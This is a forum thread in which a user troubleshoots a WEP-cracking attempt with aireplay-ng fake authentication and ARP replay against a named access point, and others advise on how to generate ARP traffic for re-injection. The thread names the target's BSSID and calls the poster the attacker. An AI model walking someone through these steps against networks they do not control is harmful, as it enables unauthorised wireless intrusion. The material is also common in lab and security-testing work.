Not capturing packets correctly

[Isohump]

I'm having problem with capturing packets this the first time it has happened to me and i googled the problem. Now it works fine with backtrack 3 and ubuntu but for some reason with backtrack 4 it's not working, now these are the commands I'm using and the outputs I'm getting.

Code:

root@YOU:~# aireplay-ng -1 0 -a 00:1D:68:E8:9A:87 mon0
No source MAC (-h) specified. Using the device MAC (00:24:2B:7C:3E:9D)
22:46:04  Waiting for beacon frame (BSSID: 00:1D:68:E8:9A:87) on channel 1

22:46:04  Sending Authentication Request (Open System) [ACK]
22:46:04  Authentication successful
22:46:04  Sending Association Request [ACK]
22:46:04  Association successful :-) (AID: 1)
root@YOU:~# aireplay-ng -3 -b 00:1D:68:E8:9A:87 mon0
No source MAC (-h) specified. Using the device MAC (00:24:2B:7C:3E:9D)
22:46:32  Waiting for beacon frame (BSSID: 00:1D:68:E8:9A:87) on channel 1
Saving ARP requests in replay_arp-1028-224632.cap
You should also start airodump-ng to capture replies.
1280 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)

I know it said it didn't specify a mac but even when i do specify a mac it still doesn't work..

Code:

 CH  1 ][ Elapsed: 2 mins ][ 2009-10-28 22:48

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:1D:68:E8:9A:87  -60 100     1653       73    0   1  54   WEP  WEP    OPN  Thomson1492EA

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 00:1D:68:E8:9A:87  00:11:22:33:44:55   -1    1 - 0      0        2
 00:1D:68:E8:9A:87  00:24:2B:7C:3E:9D    0    1 - 1      0       25

Any suggestions would be great.... THNX

[hawaii]

Seems like it hasn't located a useable packet for re-injection.

Simply ping an unreachable or non-existant IP from the client on the network, it will broadcast and then aireplay-ng will pick it up and start re-injection.

[Isohump]

just tried it still no luck.

[Gitsnik]

If you use wireshark on the interface and put in the WEP key can you see ARP packets being sent across the wire(less) when you try to ping other machines?

[Isohump]

Do you mean ping the router or the computers connected.. If they are the computers connected how am I supposed to go about doing that when I'm not connected to the router.

[mortis]

What Gitsnik says is: ping the router with a computer already connected on the network and then look on your unconnected computer if you see some ARP packets.

[Gitsnik]

Quote:

Originally Posted by mortis

What Gitsnik says is: ping the router with a computer already connected on the network and then look on your unconnected computer if you see some ARP packets.

Correct. Or a non-existant IP from a connected computer (more likely to generate an ARP).

If the router is 192.168.1.1 and the connected machine is 192.168.1.2, the connected machine should try to ping 192.168.1.3 for maximum chance of creating an ARP packet. Then, the unconnected attacker should pick it up. If it does not, the wireshark should at least see what is operating on the network - so if you see an ARP packet in wireshark, there is something wrong with your aircrack installation.

[Isohump]

I just figured it out I have to use a mon0 for injecting and mon1 for capturing and on top of all that wlan0 must be down weird huh. Well if anyone has the same problem as me try it out and see if that works for you. ^_^

And thanks for all of your feedback Gitsnik, Mortis and Hawaii.